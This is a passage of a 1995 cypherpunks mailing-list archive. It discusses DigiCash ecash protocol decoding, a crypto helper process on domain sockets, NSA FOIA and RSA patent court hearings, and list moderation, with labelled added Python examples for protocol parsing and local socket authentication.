There are other types, like 0x93 (Multi-precision integer) that I
haven't decoded yet.

=====

The first message from the shop:

a0b9 9083 0000 37a1                         # ......7.

a092 9081 0490 810a 9184 30ad 1930 9081     # ..........0..0..
4f92 8c65 7368 6f70 4063 322e 6f72 6792     # O..eshop@c2.org.
9063 6769 2d62 696e 2f64 6f72 656d 6169     # .cgi-bin/doremai
6c92 8090 8100 a1                           # l......

What it means:

a0b9: Header (Message length)
9083 000037: integer = 0x37 (length of following message)
a1: EOR

a092: Header (Payment Request)
9081 04: integer = 4
9081 0a: integer = 10 (cost in cents)
9184 30ad1930: time
9081 4f: integer = 79
928c "eshop@c2.org" : string (payee)
9290 "cgi-bin/doremail" : string (description)
9280 : empty string
9081 00: integer = 0
a1: EOR

   - Ian
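
A decoder for the field encoding Ian describes above, run over the bytes of his hexdump; it is an added example, not part of the original post and not DigiCash's code. The function names, the strict length checks and the rejection of any tag the post does not list are assumptions of this example.

```python
from datetime import datetime, timezone

HEADER, EOR = 0xA0, 0xA1
INT, DATE, STRING, DATA = 0x90, 0x91, 0x92, 0x94
PAYMENT_REQUEST = 0x12  # header type from the list in the message

# Bytes retyped from the hexdump in the message (ASCII column dropped).
CAPTURE = bytes.fromhex(
    "a0b99083000037a1"                                  # length record
    "a092" "908104" "90810a" "918430ad1930" "90814f"    # header, 4, cost, time, 79
    "928c" "6573686f704063322e6f7267"                   # payee
    "9290" "6367692d62696e2f646f72656d61696c"           # description
    "9280" "908100" "a1"                                # empty string, 0, EOR
)


class DecodeError(ValueError):
    """The buffer does not follow the encoding described in the message."""


def _read_tag(buf, pos):
    """Read one (tag, 0x80+value) byte pair; return (tag, value, next_pos)."""
    if pos + 2 > len(buf):
        raise DecodeError(f"truncated tag at offset {pos}")
    tag, arg = buf[pos], buf[pos + 1]
    if arg < 0x80:
        # Assumption: only the single-byte 0x80+n form shown in the message exists.
        raise DecodeError(f"second byte 0x{arg:02x} at offset {pos + 1} lacks 0x80")
    return tag, arg - 0x80, pos + 2


def _read_field(buf, pos):
    """Decode one typed field; return ((kind, value), next_pos)."""
    start = pos
    tag, n, pos = _read_tag(buf, pos)
    body = buf[pos:pos + n]
    if len(body) != n:  # declared length runs past the end of the capture
        raise DecodeError(f"field at {start} claims {n} bytes, {len(body)} remain")
    if tag == INT:
        if not 1 <= n <= 4:  # range the message suggests ("probably")
            raise DecodeError(f"integer at {start} has length {n}")
        field = ("int", int.from_bytes(body, "big"))  # MSB first
    elif tag == DATE:
        if n != 4:
            raise DecodeError(f"date at {start} has length {n}")
        field = ("date", int.from_bytes(body, "big"))  # seconds since 1970
    elif tag == STRING:
        field = ("string", body.decode("latin-1"))
    elif tag == DATA:
        field = ("data", bytes(body))
    else:  # includes 0x93, whose layout the message does not give
        raise DecodeError(f"unsupported field tag 0x{tag:02x} at {start}")
    return field, pos + n


def parse_records(buf):
    """Split buf into records: header, fields, EOR. Raises DecodeError if malformed."""
    records, pos = [], 0
    while pos < len(buf):
        start = pos
        tag, rtype, pos = _read_tag(buf, pos)
        if tag != HEADER:
            raise DecodeError(f"expected header 0xa0 at {start}, got 0x{tag:02x}")
        fields = []
        while True:
            if pos >= len(buf):
                raise DecodeError(f"record at {start} has no EOR marker")
            if buf[pos] == EOR:
                pos += 1
                break
            field, pos = _read_field(buf, pos)
            fields.append(field)
        records.append({"type": rtype, "fields": fields, "size": pos - start})
    return records


def framing_ok(records):
    """True if record 0 holds one integer equal to the byte size of record 1.

    The dump's first header is a0 b9 (type 0x39) while the list in the message
    gives 0x29 for Length of Message, so the type value is not checked here.
    """
    return (len(records) == 2
            and [k for k, _ in records[0]["fields"]] == ["int"]
            and records[0]["fields"][0][1] == records[1]["size"])


def cleartext_fields(record):
    """Return the Payment Request values the message says travel in the clear."""
    kinds = [k for k, _ in record["fields"]]
    expected = ["int", "int", "date", "int", "string", "string", "string", "int"]
    if record["type"] != PAYMENT_REQUEST or kinds != expected:
        raise DecodeError("not a Payment Request with the layout from the message")
    v = [value for _, value in record["fields"]]
    return {"amount_cents": v[1], "time": v[2], "payee": v[4], "description": v[5]}


if __name__ == "__main__":
    recs = parse_records(CAPTURE)
    info = cleartext_fields(recs[1])
    print("framing ok:", framing_ok(recs))
    print(datetime.fromtimestamp(info["time"], timezone.utc).isoformat(), info)
```

Anyone who can observe the connection recovers the payee, item description and amount with nothing more than this decoder, which is the privacy point raised earlier in the thread.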




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 23 Nov 1995 10:14:21 +0800
To: cypherpunks@toad.com
Subject: The Mesh and the Net
Message-ID: <199511230141.UAA02365@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


SciAm's December article on future high-tech carnage cites:

"The Mesh and the Net: Speculations on Armed Conflict in a
Time of Free Silicon," by Martin C. Libicki, March, 1994. 
(233kb)

Available on the Web at:

<http://www.ndu.edu/ndu/inss/macnair/mcnair28/m028cont.html>

NDU is the National Defense University, Libicki's teat.

He is quoted: "We're getting a lot of clever ideas about how
to fight a Gulf War more efficiently, but we rarely get
anything about how to fight a Vietnam more efficiently."

Here are excerpts from his preface:

   Mesh -- the term applied to military applications -- points to the
   holes; as information technology places a finer mesh atop the
   battlefield, more objects are caught in it. Net -- the term applied
   to civilian applications -- points to the substance of the system;
   the connectivity of people and their machines suggests new patterns
   of social relationships and new venues for conflict. Silicon, that
   which is to become free, stands for both semiconductor chips (for
   computation) and optical fibers (for communications).

   Argument: The relationship of the once and future revolution in
   information technology to warfare is analyzed in several steps:

     * Chapter One outlines the basis for this revolution and explains
       why its most natural expression is the dispersion rather than
       accumulation of information power.

     * Chapter Two examines its expression on the battlefield in three
       aspects: Pop-up warfare, the rise of the Mesh, and the evolution
       of Fire-ant warfare.

     * Chapter Three examines whether the revolution on the battlefield
       translates into a commensurate revolution in military
       organization.

     * Chapter Four discusses implications for acquisition, research and
       development.

     * Chapter Five extends the analysis to the case of low-intensity
       conflict.

     * Chapter Six attempts a broader assessment of how civilian
       applications of information technology, the Net, may affect
       national security.

     * Chapter Seven contrasts the Mesh, and the Net.

     * The Epilogue considers certain reasons why information technology
       may not translate into the victory of the Small and the Many over
       the Few and the Large.
       
-----

<www.ndu.edu/ndu/inss> and links offer an ape-lab of global 
insecurity ebolas.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Still <x93ojg@juliet.stfx.ca>
Date: Thu, 23 Nov 1995 10:17:46 +0800
To: cypherpunks@toad.com
Subject: Re: PGP in Canada
In-Reply-To: <Pine.3.89.9511222044.B25201-0100000@tesla.cc.uottawa.ca>
Message-ID: <Pine.A32.3.91.951122213807.121948C@juliet.stfx.ca>
MIME-Version: 1.0
Content-Type: text/plain


I think people may have misunderstood me.  I am able to get PGP, I just 
want to know if it is legal for me to do so as I want to install it on a 
network and am not a big fan of jail.  It would do serious things to my 
future in the Canadian military.  All I want to know quite simply is "Is
it legal for me to ftp a copy of PGP?"  The MIT site says that it is OK as
long as I am exporting it to Canada for use on a machine in Canada.
Although other sites say that it is not permitted to be exported to Canada.
 

--

	     T H E  M A N , T H E  M Y T H , T H E  L E G E N D . 
******************************************************************************
* Dylan "Still" Boudreau	* Knowledge is proud that she knows so much; *
* Internet: x93ojg@stfx.ca	* Wisdom is humble that she knows no more.   *
******************************************************************************
*       Homepage: http://juliet.stfx.ca/people/stu/x93ojg/welcome.html       *  
******************************************************************************

		When someone says, "That's a good question." 
		 You can be sure it's a lot better than the 
		         answer you're going to get.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Thu, 23 Nov 1995 07:44:08 +0800
To: Raph Levien <raph@c2.org>
Subject: Re: Design proposal: crypto-capable generic interface
In-Reply-To: <Pine.SUN.3.91.951122094209.29001A-100000@infinity.c2.org>
Message-ID: <Pine.BSD.3.91.951122214304.21297A-100000@usr1.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 22 Nov 1995, Raph Levien wrote:

> On Wed, 22 Nov 1995, Carl Ellison wrote:
> 
> > >Date: Sat, 18 Nov 1995 00:42:21 -0800 (PST)
> > >From: Raph Levien <raph@c2.org>
> >
> > >   I propose that the new interface lives as a sort of daemon, rather
> > >than a static collection of command line script pieces. 
> > 
> > Danger, Will Robinson!  (see below)
> 
  attila->
    the daemon, in and of itself, is not dangerous -it becomes critical
if it is accessible via the port number tables. the problem with a user
invoked slave process via a socket mechanism is the same as with a .dll or
linkable library: the application needs to determine the authenticity of the
single application socket.

    the system wide multi-process daemon has an advantage in one respect: it
can only be loaded by the administrator, and as long as each invocation 
declares (and wipes at exit) its one memory allocation, including any 
pseudo-static variables --keep in mind that it must not be tied to the 
external tables.  Therefore, in order to not be passing keys, passphrase, 
and all that good stuff across a lan, the daemon must be able to verify 
that the caller is literally local.  This works even on diskless 
workstations as long as they have sufficient memory to support the 
application and the processes are specified non-swappable.
 <-attila

>    In retrospect, "daemon" was a poor choice of words to describe my
> proposal. "Slave process" gets the idea across much better, but may be a
> bit less PC. A daemon sits on a publicly accessible port, such as a TCP/IP
> socket. The slave process is only accessible to the user who invoked it
> (enforced by the OS's file permissions). Further, it only gives secrets to
> individual processes that authenticated themselves first (by sending a
> passphrase down the connection to the slave process). 
> 
> > >   Once the negotiation has been established, the application can send
> > >the daemon MIME objects that the app does not understand but the
> > >daemon does (for example, an image/fractal). The daemon can return a
> > >MIME object that the app does understand (for example, an image/ppm).
> > 
> > This part sounds good...a sort of master translation service.
> 
>    I'm glad you like it!
>
    <attila> the temptation here is to use plugins to reduce the load
component.  Again, you have the problem of tampered linkable libraries or
.dlls.  Secondly, the problem with diskless workstations rears up, again
--the diskless workstations must obtain their loadable modules from the
LAN/WAN unless RAM is infinite and everything is preloaded --except, here
comes the LAN/WAN again before load.

    of course, both the basic daemon and all the loadable plugins can
also be encrypted with the header containing at least lateral and linear
checksums, if not polynomial check subroutines for authentication. in both 
cases, the base daemon must verify the authenticity which means it needs 
a system manager modifiable list table.

    the use of public/private key pairs which can be modified for each
site by a system manager with either a special routine or a debugger,
provides an additional level of security. 

    although you could enable a similar service between the daemon and 
the calling module using DH for each "session," thereby making it even 
harder for an interloper to monitor any IPC connections, even if LAN/WAN 
usage was permitted under these conditions --just how far do you want or 
need to push the limits of "secure."  I'll answer that the usual way for 
anyone who has written code, let alone secure code or crypto --to the max 
--better snooping tools are always around the corner (it's just like the
arms race).  --and, there is always the wrapper approach on top of this.
 <attila>
 
> > >   Alternatively, the daemon may request an authentication. This is
> > >useful when resolving external bodies that require authentication,
> > >including non-anonymous FTP, and standard authenticated HTTP. In this
> > >case, the daemon sends a message to the app requesting the
> > >authentication. It specifies whether it needs both username and
> > >password, or just password. In the latter case, it hands a username to
> > >the application.
> > >   The application can then query the user for the authentication
> > >data. It hands this back to the daemon. In reply, the daemon indicates
> > >success or failure. In case of success, it hands the object back to
> > >the app.
> > 
> > Now I get worried.  This communication with the demon is via some IPC --
> > maybe even via a LAN.  Some things can't be distributed safely and
> > authentication is #2 on my list.
> 
>    No, the communication is not via a LAN. On a Unix system, the 
> communication is through Domain Sockets. Both processes live on the same 
> machine, and the socket "lives" on the local file system.
>
    <attila> No, that is not always true; again, user space
sockets present the same security risk as loadable modules unless you have
a base socket which decrypts and authenticates each loadable module. And, 
user sockets are more easily attacked.
 <attila>
 
>    I submit that my proposal is every bit as secure as, say, PGP is now. 
> If you can't trust the operating system not to hand domain sockets from 
> one process to another, then you certainly can't trust it to, for 
> example, substitute different binaries for the crypto program (an attack 
> which Ian et al cleverly mounted a few weeks ago).
>    If it were not the case that my proposal was as secure as PGP, then I 
> would want to withdraw it. However, the proposal has so many advantages 
> that I would want to see a serious description of the attack, rather than 
> just feelings of endangerment to Will Robinson.
> 
> > >   Encryption is a bit more tricky, but in essence you just hang a
> > >premail-alike off this kind of protocol. The hard part is specifying
> > >the key, but you just call it a "parameter" and put in hooks for the
> > >daemon to ask for whatever parameters it needs. 
> > 
> > Crypto keys are #1 on my list of things you can't distribute (unless they
> > are wrapped, of course).
> 
>    I should have made it clearer that I am referring to public keys. If
> public keys are on the list of things that can't be distributed, then I 
> believe we are in trouble.
>
    <attila> in order for a "user" to decrypt public key paired messages,
the user's private key must be passed to the daemon --obviously in a secure
packet which again can be initiated with DH; the alternative is a lookup
from a standardized location such as ~/.private/ring which can be
non-readable except by the owner or by the daemon running suid as the user
at the authentication level. 

    Personally, I would rather pass the private key from the user module
interface in an authentication packet and not have it necessarily visible
--the same goes for the pass phrase. 
    
    this checking and rechecking may be necessary for maximum security on 
a multi-user machine, but you may have more authentication overhead than 
translation overhead in a short packet...

    and, what do you do with MickeySoft?  with as much 3.1 base code as 
there appears to be from the complaints, W95 looks like a problem for 
multi-process packetizing, etc. Maybe NT is better?  I do not use either 
and will stay with some form of BSD (Solaris and FreeBSD currently). I 
may be the last holdout on earth as the posting yesterday detailed, but I 
will be a holdout.
  <attila>
 
> > >						 This requires that
> > >keys have some nonforgeable names, which is unfortunately not a
> > >feature of PGP 2.6.2. S/MIME will do it just fine, if you buy into the
> > >Certification Authority (<wink> at Nick Szabo).
> > 
> > Public keys, if that's what you're talking about, have perfectly good
> > nonforgeable names -- themselves.  They are unique.  They are the proper
> > name which can collect all the attributes of that key which are of interest
> > (e.g., permission to spend $, name of a human who knows the private key,
> > attributes about that human, etc.).
> 
>    Ok. But public keys have one serious disadvantage: their size. I can't 
> put a public key on my business card or read it over the phone. I want an
> unforgeable key name. I want this to be the standard key name in the 
> interface between the application and the crypto engine. I want users to 
> be able to specify them directly, at the very least to bootstrap the 
> public key infrastructure.
>    I propose using the MD5 hash of the whitespace-free MOSS 
> representation of the public key, in hex. It's simple enough to be 
> described in one sentence, but does everything I want.
>
    <attila> there is nothing that says you can not use a 64 or 128 bit
public key; nothing says you must use 1024 bits for the public. the fact
the private key is 1024 bits is irrelevant other than the fact it
increases security. there are some advantages of simplicity for
simplicity's sake! :)
  <attila>
 
>    Note that PGP 2.6.2 does _not_ allow the use of a public key as the 
> name of a public key, unless you do a horrible hack such as replace the 
> pubring.pgp file with the one public key of interest. This is a 
> significant problem when trying to identify which key signed a signed 
> message. I haven't bashed around with TISMOSS enough, but I'm not sure it 
> will allow this either. I got the impression that it preferred the use of 
> an alias.
> 
> > >   One final aside: I've been fairly frustrated with this mailing list
> > >as a forum for talking about real design proposals and implementation
> > >issues. Ignorant posts by the likes of Dr. Fred and Alice d'Clueless
> > >tend to attract far more attention than real crypto work. I want a
> > >forum for, and just for, cypherpunks who write code. If I had just a
> > >smidgen more free time (as if), I'd be trying to start one
> > >myself. Anyone else?
> >
    <attila> for a man with a piled higher and deeper, Dr. Fred's spelling
and grammar skills are quite poor, maybe 8th grade.  we don't need to deal
with the pompous holier than thou attitude from anyone.
    I too have a piled higher and deeper in information techniques (which
includes security). what's it worth?  Not much if you can not support it
with your actions and accomplishments. 
    ...just open your mouth Dr. Fred so we can check your IQ (Ignorance
Quotient!). 
  <attila>

> > I've seen this happen several times.  As a list gets popular, it
> > diversifies.  You might try sci.crypt.research -- since it's moderated.
> 
>    Thanks for the suggestion. However, my concerns are with 
> implementation and deployment, not research.  I am perfectly willing to 
> consider cryptographic algorithms to be black boxes that do what they say 
> they will. I think the charter exists to start a new list. John Gilmore 
> has already offered to start a "coderpunks" list on toad.com. Shall we 
> take him up on it?
> 
> Raph
> 
    <attila> The problem with a new list is that we really need a
moderated list;  the condition being that all messages dealing with code
pass if you are a member, but no one should be discriminated against
membership --no politics, not even the alerts which we really should be
aware of as public "policy" (if you can call it that) does concern how we
approach crypto in general. sci.crypt.research is a little more technical
than it needs to be and rarely has the give and take we have in this list
--particularly when we are kicking around a proposal (like the universal
translator of this thread).
    I would suggest that the code arguments be cross posted to the 
current list.  we might find some interesting political considerations 
may lead to proposals for code.
    The problem is the moderator --who has the time? If not John
Gilmore, maybe TCM??? 
    I have more or less retired from active consulting and would do it if
I were not overcommitted including some travel for the next several months
--I do have a fast notebook, but toll charges are a bitch.  It is
important that there is "moderation" which blows away ideas despite
personal bias and preference. 
    One possible way to set the moderated list is to post as we always 
have to cypherpunks, and the moderator pops all the code related postings 
over to cypherpunks.moderated@toad.com (or wherever). This means the
main list is complete, with the moderated list code limited. Once a 
message thread is identified, procmail would pick up the thread and 
forward it. .procmailrc commands could be handled automatically with a 
small script.
    Currently, after procmail breaks incoming into lists, I sort
cypherpunks by subject and "pre-delete" all the noise discussions (other
than a few like tcm or gilmore or perry, etc.). I could get nasty with a
more aggressive procmail (mine only splits incoming into separate lists and
wipes out Dr. Fred before it even gets to any list). 
    Do a few of us wish to hash this problem out in email?  Maybe we 
could swap the responsibility around when someone is out of town. Count 
me in, I'm all in favour of a moderated list with a reasonably controlled 
membership, not just a listproc or majordomo open subscribe function.

  <attila>
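
[Added example, not part of the original message and not code from Raph's proposal.] The thread above argues over whether a per-user helper on a Unix domain socket can know its caller is local and is the invoking user; this sketch shows one way to check that on Linux, using a 0700 directory plus the kernel's SO_PEERCRED peer credentials. The names (keyhelper-, open_private_listener, caller_allowed) and the READY/DENIED replies are assumptions made for the illustration.

```python
import os
import socket
import stat
import struct
import tempfile

# Linux "struct ucred" as returned by SO_PEERCRED: pid_t, uid_t, gid_t.
UCRED = struct.Struct("iII")


def open_private_listener():
    """Bind a stream socket inside a directory only the invoking user can enter."""
    sock_dir = tempfile.mkdtemp(prefix="keyhelper-")   # created with mode 0700
    path = os.path.join(sock_dir, "sock")
    srv = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
    old_umask = os.umask(0o177)                        # socket file becomes 0600
    try:
        srv.bind(path)
    finally:
        os.umask(old_umask)
    srv.listen(1)
    return srv, sock_dir, path


def peer_credentials(conn):
    """Ask the kernel who is on the other end of a connected AF_UNIX socket."""
    raw = conn.getsockopt(socket.SOL_SOCKET, socket.SO_PEERCRED, UCRED.size)
    pid, uid, gid = UCRED.unpack(raw)
    return {"pid": pid, "uid": uid, "gid": gid}


def caller_allowed(cred, owner_uid):
    """Policy (assumed): only the user who started the helper may talk to it."""
    return cred["uid"] == owner_uid


def demo():
    """Run helper and caller in one process and report what the helper learned."""
    srv, sock_dir, path = open_private_listener()
    client = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
    conn = None
    try:
        client.connect(path)              # completes against the listen backlog
        conn, _ = srv.accept()
        cred = peer_credentials(conn)     # filled in by the kernel, not the caller
        allowed = caller_allowed(cred, os.getuid())
        conn.sendall(b"READY\n" if allowed else b"DENIED\n")
        reply = client.recv(16)
        # Constructed credentials for a different user, to exercise the refusal.
        stranger = {"pid": 1, "uid": os.getuid() + 1, "gid": 0}
        return {
            "dir_mode": stat.S_IMODE(os.stat(sock_dir).st_mode),
            "sock_mode": stat.S_IMODE(os.stat(path).st_mode),
            "peer_is_this_process": cred["pid"] == os.getpid(),
            "allowed": allowed,
            "reply": reply,
            "other_uid_allowed": caller_allowed(stranger, os.getuid()),
        }
    finally:
        for s in (conn, client, srv):
            if s is not None:
                s.close()
        os.unlink(path)
        os.rmdir(sock_dir)


if __name__ == "__main__":
    print(demo())
```

An AF_UNIX socket has no network address, so a caller on another host cannot reach it at all; the credential check then separates local users from one another. It does not address the tampered-binary concern raised in the thread, since any process running as the same uid passes.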
 







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Fri, 24 Nov 1995 02:13:02 +0800
To: gnu@toad.com
Subject: Two 'punky court hearings: Dec 6th, SF and San Jose
Message-ID: <9511231746.AA16675@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 9AM on December 6 in San Francisco, the 9th District Court of Appeals
will finally hear the appeal of my original FOIA case against NSA.

At 10AM on December 6 in San Jose, Roger Schlafly's case against RSA Data
Security will hold a hearing on the validity of the Diffie-Hellman,
Hellman-Merkle, RSA, and Schnorr patents.

Mark your calendar!

My hearing is the first (and probably only) oral arguments to the
Court of Appeals.  The overall issue is whether NSA is violating the
law by deliberately taking six months to three years to handle
ordinary FOIA requests.  (And what can/will the courts do about it.)
The specific issue that we appealed on is whether the lower-court
judge in the case has the discretion to throw out a case in which the
government is violating the law, without addressing the problem.

The legal theory is that since the courts are peoples' only recourse
when the government violates its own laws, the court system can't
simply ignore the problem.  This would mean that the people have NO
recourse against a despotic government (except armed or nonviolent
rebellion, which is a terrible solution).

There are lots of other ramifications, since NSA has built up a
formidable wall of nit-picky procedural defenses.  Since the judges
will steer the oral hearing, I don't know whether they'll focus on the
big issue or the gritty details.  I'll work on getting some of the
briefs online.

This case (CA No. 94-16165) is NOT at the Federal Building; the Court
of Appeals is at 121 Spear Street (2 Rincon Center), 4th Floor,
Courtroom 2, 9AM.  I think Rincon Center is the old Post Office at
Mission and Spear Streets.  Spear is "0th Street", downtown between
the Bay and 1st Street.

It probably won't be as much fun as the Bernstein hearings.  But if we
win (here and in a few other hearings), it could pry NSA open to
public accountability.  And this would go a long way toward making
some real progress in the crypto policy debate.  We might actually get
to see the other side's concerns!

If you come, wear a "good clothes" costume.

If I wasn't going to be at my own hearing, I'd be at Roger's.  He has
sued RSA and PKP in the hope of overturning their patents, which they
have been wielding like a club over anyone trying to make progress in
public-key cryptography.  (RSA's idea of reasonable and
non-discriminatory licensing is "How much money do you have?").
Though some companies have disputed RSA's patents, nobody has ever
made a court determine whether the patents are really valid.  Roger
aims to fill that gap.

You may even get to see Jim Bidzos ooze through the courtroom.  In an
earlier hearing in the Schlafly case, Jim claimed that Roger had
insufficient honesty and character because he had held a joint talk
with *me* at Crypto '94 about our respective lawsuits.  Jim described
me to the court as an avowed destroyer of intellectual property
rights, and strongly implied that I had unlawfully revealed their
valuable RC4 trade secret.  It ain't so, on any level, and if he says
something like it again, I want lots of witnesses.

10AM, San Jose federal court, Judge Williams' courtroom.  I hope Roger
will post more details, access info for the legal documents in the
case, and directions to the building.

	John Gilmore





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Lynne L. Harrison" <lharrison@mhv.net>
Date: Fri, 24 Nov 1995 00:58:36 +0800
To: cypherpunks@toad.com
Subject: Re: PROPOSAL: cypherpunks-news@toad.com? (was: rand-test)
Message-ID: <9511231639.AA25523@mhv.net>
MIME-Version: 1.0
Content-Type: text/plain


<snip>
>I am inclined to agree with Perry in as much as the volume of posts to
>the cypherpunks list is greatly increased by reposts of news from
>other mailing lists, USENET newsgroups, WWW sources, newspapers, TV
>programs, films, books, talks, etc.  While some of the information
>posted is interesting, and relevant, some others are less relevant,
>bordering on noise.
>
>The proposal: a separate list for current-event reports/news/reposts.

1.  Creating a separate list, IMHO, will not stop cross-posts to the list.
People will merely add one more list to their "cc" line.

2.  More importantly, I am troubled with the "this is OUR list" attitude
that some people have expressed.  Yes, it is a pain when there are
cross-posts that are completely off-topic but, as Adam correctly points out,
some are interesting and relevant.
    One of the tenets proposed by those on this list is free speech.  Most
of us are on more than one list, so I'm assuming that most of us receive
100+ messages a day.  It is irritating to read something that's been crossed
to c|punks that has nothing to do with this list.  However, it only takes a
few seconds to arrive at that conclusion and trash the post.
    The "they are targeting this list" borders almost on paranoia.  While
some paranoia is healthy :) - it should not lead to the cry to ban posts
that have been *deemed* to be inappropriate.
    I find it interesting that those who express that the net should be a
community where expression is to be encouraged and defended - until the time
arrives when such "unsolicited/unwanted/offensive/irrelevant" expression
knocks on one's front door.

Regards -
  Lynne


*******************************************************
Lynne L. Harrison, Esq.   |     "The key to life:
Poughkeepsie, New York    |      - Get up;
E-mail:                   |      - Survive;
lharrison@mhv.net         |      - Go to bed."
*******************************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Fri, 24 Nov 1995 00:54:47 +0800
To: sjb@universe.digex.net (Scott Brickner)
Subject: Re: MED_vac
In-Reply-To: <199511222108.QAA10547@universe.digex.net>
Message-ID: <199511231641.LAA07272@homeport.org>
MIME-Version: 1.0
Content-Type: text


Scott Brickner wrote:

| "Thomas M. Swiss" writes:
| >     A (possibly stupid) thought: could commercial key escrow help here?
| >
| >     I very much want hospitals to have fast access to my medical data if
| >my broken and bleeding body should come through their door, even if I am
| >unconscious and my personal physician cannot be reached. On the other hand,
| >I don't want anyone to be snooping through them right now.
| 
| Actually, Bell Labs outlines a system which can preserve anonymity
| under these circumstances in "The Use of Communications Networks to
| Increase Personal Privacy In a Health Insurance Architecture" at
| <URL:ftp://ftp.research.att.com/dist/anoncc/privacy.health.ps.Z>.
| 
| It's based on their anonymous credit card protocol, which is really a
| sort of identity escrow service managed by a remailer.  You might find
| it interesting.

	Maxemchuk's anon credit card system depends to a huge degree
on fast, highly available remailers, but he makes no provisions for
funding them.  He suggested at a talk I attended that the Federal
Reserve could operate the one remailer that his system would use to
protect your privacy.

	Other than that, it's an interesting system which uses no
public key crypto for mostly anonymous transactions.

Adam
-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark Twain Ecash Support" <mtwain@netcom.com>
Date: Fri, 24 Nov 1995 02:21:40 +0800
To: Hal <hfinney@shell.portal.com>
Subject: Re: ecash protocol: Part 1
Message-ID: <199511231755.JAA02492@netcom15.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


> I know ecash has some proxy support
> but I'm not sure how it works.  There are SOCKS proxies and http proxies,
> and I don't know which it uses.  I used a logging httpd proxy to derive
> the data for the SSL challenges I did this past summer.  It might be
> interesting to post the binary data from some ecash transactions.

The Ecash firewall support works by sending the messages as multipart 
MIME messages. The browser is then set to hand the application/ecash
message to the Ecash front end.

> I wonder if it would be legal to write shop software which sent such a
> payment request, took the resulting coins, and deposited them in the bank
> (if we could figure out all the protocols necessary). 

IANAL. What would you hope to gain from creating such a piece of 
software?

--Lucky at

-- Mark Twain Ecash Support
   <mailto:support@marktwain.com>
   <http://www.marktwain.com/ecash.html>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Fri, 24 Nov 1995 04:41:21 +0800
To: cypherpunks@toad.com
Subject: Bitbux could eliminate some domestic currencies?
Message-ID: <9511232021.AA20165@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Date: Mon, 13 Nov 1995 17:35:39 -0500
From: Dave Farber <farber@central.cis.upenn.edu>
Subject: IP: cybercash! Holy Mackeral, Andy!
To: interesting-people@eff.org (interesting-people mailing list)

>From a letter in [My dog, I mean my software, ate this part of the msg -- gnu]

"Sir, Prof Alec Chrystal ... argues that because cash is unimportant, its
replacement by smart cards will have little impact. However, cash is
virtually the only kind of money issued by government (in the UK, more than
99 per cent). If a government cannot issue cash because e-money facilitates
the use of another country's currency  for domestic transactions, it will
lose virtually all its seignorage. The government will have to issue some
£23 billion extra gilts and then pay about £2 billion every year in extra
interest.

"Moreover, cash circulates much more quickly than bank deposits (it has a
high velocity-adjusted weight). Cash was used for almost 15 billion retail
transactions in the UK in 1993, versus 4 billion for all other methods. So
the currency in which retail transactions is priced is in practice
determined by the denomination of cash. E-money would threaten this
dominance, allowing people to stop using domestic currency completely
(other than for paying taxes).

"The importance of e-money replacing cash is greater than possible effects
on exchange rates. Rather, it might make certain currencies to all intents
and purposes disappear."

Giles Keating
head of global economics
CS First Boston
London, UK




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 24 Nov 1995 01:56:42 +0800
To: cypherpunks@toad.com
Subject: Applied Crypto 2nd Ed.
Message-ID: <199511231725.MAA24475@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



I'm surprised no one has been giving their review of Applied
Cryptography, 2nd. Ed., AKA The Bible.

I have little time for a formal review -- my copy, purchased directly
from Bruce (I encourage people to buy straight from him -- he deserves
to get the cash!) only arrived a couple of days ago. It's an amazing
piece of work. He's outdone the 1st Edition by a large stretch, which
I wouldn't have thought possible. I've bought the hardcover -- I'll be
opening it up over and over again, I figure...

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: iagoldbe@calum.csclub.uwaterloo.ca (Ian Goldberg)
Date: Fri, 24 Nov 1995 02:40:39 +0800
To: cypherpunks@toad.com
Subject: Re: ecash protocol: Part 1
In-Reply-To: <v02120d05acd986f50e5e@[199.2.22.120]>
Message-ID: <492e1i$smd@calum.csclub.uwaterloo.ca>
MIME-Version: 1.0
Content-Type: text/plain


In article <v02120d05acd986f50e5e@[199.2.22.120]>,
Douglas Barnes <cman@communities.com> wrote:
>
>> From what I gathered from Doug's posts a little while back, the _client_
>>stuff is perfectly fine; only the _bank_ stuff is Chaum-patented.
>>
>
>This is exactly backwards. Also, it is entirely possible that they
>have structured the protocol to make sure that both sides have to
>practice some element of Digicash intellectual property. What I
>said was "it is possible to create an anonymous digital cash system
>where the bank does not infringe and the client can optionally
>infringe or not infringe (sacrificing anonymity)."
>
>(See: http://www.communities.com/paper/agnostic.html)
>
>

Yes.  D'oh.  I realized this while talking to Dave shortly after I posted.
All the bank does is send back the cube root of what it received from the
client.  If the client wants to multiply by the cube of a random number
before sending to the bank, and dividing by that random number after,
that's up to it.  The system Hal mentioned, though (client sends payment
requests, receives payments, deposits them), still doesn't infringe,
as long as it doesn't do _withdrawals_.

   - Ian "Hoping he hasn't goofed up again..."
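
[Added example, not part of the original message and not DigiCash's code or wire format.] The arithmetic Ian describes, worked through: the bank returns the cube root mod N of whatever it receives, and the client may multiply by the cube of a random number first and divide by that number afterwards. The key is a constructed toy built from two publicly known primes, and the hash-to-integer step (coin_value) and all function names are assumptions made for the illustration.

```python
import hashlib
import secrets
from math import gcd

E = 3
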